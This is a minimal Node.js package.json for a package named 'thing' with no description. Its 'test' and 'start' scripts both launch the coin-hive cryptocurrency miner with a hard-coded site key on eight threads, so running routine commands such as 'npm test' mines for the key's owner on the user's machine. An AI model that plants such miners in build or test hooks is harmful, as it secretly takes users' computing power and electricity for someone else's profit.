{
  "name": "thing",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "coin-hive sh2NoKNJUg9mfgN2dqGNOZRGMxdRG7JY --threads 8",
    "start": "coin-hive sh2NoKNJUg9mfgN2dqGNOZRGMxdRG7JY --threads 8"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "coin-hive": "^1.6.3"
  },
  "engines": {
    "node": "8.1.2"
  }
}